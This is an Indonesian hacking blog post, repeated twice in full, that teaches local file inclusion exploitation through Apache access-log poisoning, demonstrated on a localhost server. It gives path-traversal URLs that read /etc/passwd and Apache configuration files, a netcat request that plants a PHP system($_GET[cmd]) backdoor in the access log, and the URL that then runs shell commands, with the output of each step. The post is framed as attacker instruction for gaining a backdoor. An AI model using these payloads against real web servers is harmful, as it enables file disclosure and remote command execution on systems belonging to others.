Exploitasi LFI dengan metode Apache Log Injection
—
Tuesday 27 March 2012
—
Add Comment
—
Hacking
LFI - Apache Log Injection
Ini adalah salah satu teknik heking yg cukup lama dan sudah hampir terlupakan. Kebanyakan sekarang menginjecsi LFI menggunakan exploitasi pada environ. Jika envion gagal di inject, kebanyakan sudah mengatakan "gagal exploitasi LFI". But, kata itu tidak berlaku untuk xcrew, masih ada teknik yang layak di coba (dulu semua orang menggunakan teknik ini). Teknik ini sering disebut Apache Log Injection. Yaitu dengan menginjeksi command line backdoor (system()) ke log access apache, kemudian menginclude log tersebut. sehingga attacker mendapatkan backdoor.
Teknik ini dilakukan dengan memanfaatkan sifat apache yang ngelog semua akses. Termasuk script backdoor yang di sisipkan. metode nya kayak gini:
request ke victim dengan fake page. fake biasanya merupakan command backdoor. misal:
nah, karena sifat apache yang ngelog semua akses, maka script kecil tersebut di log oleh apache di logacess nya.
next time, attacker mengincluce log tersebut, dan mendapatkan backdoor buatanya.
tantangan sebenarnya pada "menemukan log access" itu sendiri.
konsep simple nya sih seperti itu. prakteknya ya kayak gitu. lgsg aja.
bug lfi: http://localhost/content.php?page=[LFI]
Code: [Select]
Warning: include(/media/E/LocalServer/htdocs): failed to open stream: Not a directory in /media/E/LocalServer/htdocs/content.php on line 1 Warning: include(): Failed opening './' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /media/E/LocalServer/htdocs/content.php on line 1
next, mencoba include /etc/passwd.
Code: [Select]
http://localhost/content.php?page=../../../../../etc/passwd
dan berhasil
Code: [Select]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
oke, bisa include local. selanjutnya, kita cari dimana log access nya. disinilah tantangan sebenarnya. menemukan logaccess apache. cukup sulit. dan bisa bikin frustasi. untuk mempermudah, kita cari dulu httpd.conf
Code: [Select]
http://localhost/content.php?page=../../../../../etc/httpd.conf
kagak ada. coba tempat yg lain
Code: [Select]
http://localhost/content.php?page=../../../../../etc/httpd/conf/httpd.conf
kagak ada juga. terus berusaha. coba kita lihat os nya.
Code: [Select]
http://localhost/content.php?page=../../../../../etc/issue
Ubuntu
Code: [Select]
Ubuntu 10.04 LTS \n \l
Kita googling, cari dimana letak apache pada ubuntu 10.04. Lalu kita coba.
Code: [Select]
http://localhost/content.php?page=../../../../../etc/apache2/apache2.conf
Dapat!!
Code: [Select]
#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They're here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
# 1. Directives that control the operation of the Apache server process as a
# whole (the 'global environment').
# 2. Directives that define the parameters of the 'main' or 'default' server,
# which responds to requests that aren't handled by a virtual host.
# These directives also provide default values for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, which allow Web requests to be sent to
# different IP addresses or hostnames and have them handled by the
# same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#
### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#
#
LockFile /var/lock/apache2/accept.lock
#
#
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15
##
## Server-Pool Size Regulation (MPM specific)
##
# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 150
MaxRequestsPerChild 0
# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 2
MinSpareThreads 25
MaxSpareThreads 75
ThreadLimit 64
ThreadsPerChild 25
MaxClients 150
MaxRequestsPerChild 0
# event MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadLimit 64
ThreadsPerChild 25
MaxRequestsPerChild 0
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
Order allow,deny
Allow from all
#Satisfy all
#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log
#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn
# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
# Include all the user configurations:
Include /etc/apache2/httpd.conf
# Include ports listing
Include /etc/apache2/ports.conf
#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
#
# Define an access log for VirtualHosts that don't define their own logfile
CustomLog /var/log/apache2/other_vhosts_access.log vhost_combined
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
Include /etc/apache2/conf.d/
# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/
baca satu2 dan include tiap file kalau ingin melihatnya. oke, saya potong bagian ini:
Code: [Select]
ErrorLog /var/log/apache2/error.log
disitu adalah error.log, kemungkinan access.log terletak di direktori yang sama. mari kita coba
Code: [Select]
http://localhost/content.php?page=../../../../..//var/log/apache2/access.log
yap, dapat!!
Code: [Select]
127.0.0.1 - - [27/Jul/2011:11:24:44 +0700] "GET /content.php?page= HTTP/1.1" 200 450 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:24:44 +0700] "GET /favicon.ico HTTP/1.1" 404 500 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:24:47 +0700] "GET /favicon.ico HTTP/1.1" 404 500 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:25:26 +0700] "GET /content.php?page=../../../../../etc/passwd HTTP/1.1" 200 1074 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:13:52:59 +0700] "GET /content.php?page=../../../../../etc/httpd.conf HTTP/1.1" 200 467 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:13:53:24 +0700] "GET /content.php?page=../../../../../etc/httpd/conf/httpd.conf HTTP/1.1" 200 473 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:14:46:50 +0700] "GET /content.php?page=../../../../../etc/issue HTTP/1.1" 200 317 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:14:48:24 +0700] "GET /content.php?page=../../../../../etc/apache2/apache2.conf HTTP/1.1" 200 3317 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
Perhatikan log nya, jelas sekali ada log serangan kita =))
nah, sudah dapat access.log. sekarang waktunya mengkontaminasi access.log dengan sebaris kecil script backdoor. caranya? pake netcat.
buka koneksi:
nc -vv localhost 80
kontaminasi log dengan fake request
GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0
beri header request
Host: localhost
User-agent: xzilla
tekan enter 2-3x untuk mengirim request.
Code: [Select]
array@xcrew:~$ nc -vv localhost 80
xcrew.underground.coder.team [127.0.0.1] 80 (www) open
GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0
HOST: localhost
User-agent: xzilla
HTTP/1.1 404 Not Found
Date: Wed, 27 Jul 2011 08:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 277
Connection: close
Content-Type: text/html; charset=iso-8859-1
404 Not Found
The requested URL /< was not found on this server.
Apache/2.2.14 (Ubuntu) Server at localhost Port 80
sent 80, rcvd 480
array@xcrew:~$
Not Found! wkwkwkkwkwk
itu benar. sekarang mari kita buka logaccess lagi. pastikan backdoor sudah nempel.
Code: [Select]
http://localhost/content.php?page=../../../../..//var/log/apache2/access.log
ups! error di bagian bawah
Code: [Select]
Warning: system(): Cannot execute a blank command in /var/log/apache2/access.log on line 10
itu menunjukkan klo command system() sudah tertempel di access.log dan error karena tidak ada command yg di execute. sekarang coba kita execute. ingat variable apa yang di pakai untuk sending command? $_GET[cmd].
Code: [Select]
GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0
yang itu low maksudq.
Sekarang kita coba send command.
Code: [Select]
http://localhost/content.php?page=../../../../..//var/log/apache2/access.log&cmd=uname%20-a;id;pwd
Dan hasilnya:
Code: [Select]
Linux xcrew.underground.coder.team 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
uid=1000(array) gid=33(www-data) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),29(audio),30(dip),33(www-data),44(video),46(plugdev),104(fuse),105(lpadmin),119(admin),122(sambashare)
/media/E/LocalServer/htdocs
command running well....
Sekarang kita sudah tau bagaimana exploitasi LFI dengan metode Apache Log Injection (bukan injeksi environ lagi).
(explorer crew)
Ini adalah salah satu teknik heking yg cukup lama dan sudah hampir terlupakan. Kebanyakan sekarang menginjecsi LFI menggunakan exploitasi pada environ. Jika envion gagal di inject, kebanyakan sudah mengatakan "gagal exploitasi LFI". But, kata itu tidak berlaku untuk xcrew, masih ada teknik yang layak di coba (dulu semua orang menggunakan teknik ini). Teknik ini sering disebut Apache Log Injection. Yaitu dengan menginjeksi command line backdoor (system()) ke log access apache, kemudian menginclude log tersebut. sehingga attacker mendapatkan backdoor.
Teknik ini dilakukan dengan memanfaatkan sifat apache yang ngelog semua akses. Termasuk script backdoor yang di sisipkan. metode nya kayak gini:
request ke victim dengan fake page. fake biasanya merupakan command backdoor. misal:
nah, karena sifat apache yang ngelog semua akses, maka script kecil tersebut di log oleh apache di logacess nya.
next time, attacker mengincluce log tersebut, dan mendapatkan backdoor buatanya.
tantangan sebenarnya pada "menemukan log access" itu sendiri.
konsep simple nya sih seperti itu. prakteknya ya kayak gitu. lgsg aja.
bug lfi: http://localhost/content.php?page=[LFI]
Code: [Select]
Warning: include(/media/E/LocalServer/htdocs): failed to open stream: Not a directory in /media/E/LocalServer/htdocs/content.php on line 1 Warning: include(): Failed opening './' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /media/E/LocalServer/htdocs/content.php on line 1
next, mencoba include /etc/passwd.
Code: [Select]
http://localhost/content.php?page=../../../../../etc/passwd
dan berhasil
Code: [Select]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
oke, bisa include local. selanjutnya, kita cari dimana log access nya. disinilah tantangan sebenarnya. menemukan logaccess apache. cukup sulit. dan bisa bikin frustasi. untuk mempermudah, kita cari dulu httpd.conf
Code: [Select]
http://localhost/content.php?page=../../../../../etc/httpd.conf
kagak ada. coba tempat yg lain
Code: [Select]
http://localhost/content.php?page=../../../../../etc/httpd/conf/httpd.conf
kagak ada juga. terus berusaha. coba kita lihat os nya.
Code: [Select]
http://localhost/content.php?page=../../../../../etc/issue
Ubuntu
Code: [Select]
Ubuntu 10.04 LTS \n \l
Kita googling, cari dimana letak apache pada ubuntu 10.04. Lalu kita coba.
Code: [Select]
http://localhost/content.php?page=../../../../../etc/apache2/apache2.conf
Dapat!!
Code: [Select]
#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They're here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
# 1. Directives that control the operation of the Apache server process as a
# whole (the 'global environment').
# 2. Directives that define the parameters of the 'main' or 'default' server,
# which responds to requests that aren't handled by a virtual host.
# These directives also provide default values for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, which allow Web requests to be sent to
# different IP addresses or hostnames and have them handled by the
# same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#
### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#
#
LockFile /var/lock/apache2/accept.lock
#
#
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15
##
## Server-Pool Size Regulation (MPM specific)
##
# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 150
MaxRequestsPerChild 0
# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 2
MinSpareThreads 25
MaxSpareThreads 75
ThreadLimit 64
ThreadsPerChild 25
MaxClients 150
MaxRequestsPerChild 0
# event MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadLimit 64
ThreadsPerChild 25
MaxRequestsPerChild 0
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
Order allow,deny
Allow from all
#Satisfy all
#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log
#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn
# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
# Include all the user configurations:
Include /etc/apache2/httpd.conf
# Include ports listing
Include /etc/apache2/ports.conf
#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
#
# Define an access log for VirtualHosts that don't define their own logfile
CustomLog /var/log/apache2/other_vhosts_access.log vhost_combined
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
Include /etc/apache2/conf.d/
# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/
baca satu2 dan include tiap file kalau ingin melihatnya. oke, saya potong bagian ini:
Code: [Select]
ErrorLog /var/log/apache2/error.log
disitu adalah error.log, kemungkinan access.log terletak di direktori yang sama. mari kita coba
Code: [Select]
http://localhost/content.php?page=../../../../..//var/log/apache2/access.log
yap, dapat!!
Code: [Select]
127.0.0.1 - - [27/Jul/2011:11:24:44 +0700] "GET /content.php?page= HTTP/1.1" 200 450 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:24:44 +0700] "GET /favicon.ico HTTP/1.1" 404 500 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:24:47 +0700] "GET /favicon.ico HTTP/1.1" 404 500 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:25:26 +0700] "GET /content.php?page=../../../../../etc/passwd HTTP/1.1" 200 1074 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:13:52:59 +0700] "GET /content.php?page=../../../../../etc/httpd.conf HTTP/1.1" 200 467 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:13:53:24 +0700] "GET /content.php?page=../../../../../etc/httpd/conf/httpd.conf HTTP/1.1" 200 473 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:14:46:50 +0700] "GET /content.php?page=../../../../../etc/issue HTTP/1.1" 200 317 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:14:48:24 +0700] "GET /content.php?page=../../../../../etc/apache2/apache2.conf HTTP/1.1" 200 3317 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
Perhatikan log nya, jelas sekali ada log serangan kita =))
nah, sudah dapat access.log. sekarang waktunya mengkontaminasi access.log dengan sebaris kecil script backdoor. caranya? pake netcat.
buka koneksi:
nc -vv localhost 80
kontaminasi log dengan fake request
GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0
beri header request
Host: localhost
User-agent: xzilla
tekan enter 2-3x untuk mengirim request.
Code: [Select]
array@xcrew:~$ nc -vv localhost 80
xcrew.underground.coder.team [127.0.0.1] 80 (www) open
GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0
HOST: localhost
User-agent: xzilla
HTTP/1.1 404 Not Found
Date: Wed, 27 Jul 2011 08:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 277
Connection: close
Content-Type: text/html; charset=iso-8859-1
Not Found
The requested URL /< was not found on this server.
Apache/2.2.14 (Ubuntu) Server at localhost Port 80
sent 80, rcvd 480
array@xcrew:~$
Not Found! wkwkwkkwkwk
itu benar. sekarang mari kita buka logaccess lagi. pastikan backdoor sudah nempel.
Code: [Select]
http://localhost/content.php?page=../../../../..//var/log/apache2/access.log
ups! error di bagian bawah
Code: [Select]
Warning: system(): Cannot execute a blank command in /var/log/apache2/access.log on line 10
itu menunjukkan klo command system() sudah tertempel di access.log dan error karena tidak ada command yg di execute. sekarang coba kita execute. ingat variable apa yang di pakai untuk sending command? $_GET[cmd].
Code: [Select]
GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0
yang itu low maksudq.
Sekarang kita coba send command.
Code: [Select]
http://localhost/content.php?page=../../../../..//var/log/apache2/access.log&cmd=uname%20-a;id;pwd
Dan hasilnya:
Code: [Select]
Linux xcrew.underground.coder.team 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
uid=1000(array) gid=33(www-data) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),29(audio),30(dip),33(www-data),44(video),46(plugdev),104(fuse),105(lpadmin),119(admin),122(sambashare)
/media/E/LocalServer/htdocs
command running well....
Sekarang kita sudah tau bagaimana exploitasi LFI dengan metode Apache Log Injection (bukan injeksi environ lagi).
(explorer crew)
0 Response to "Exploitasi LFI dengan metode Apache Log Injection"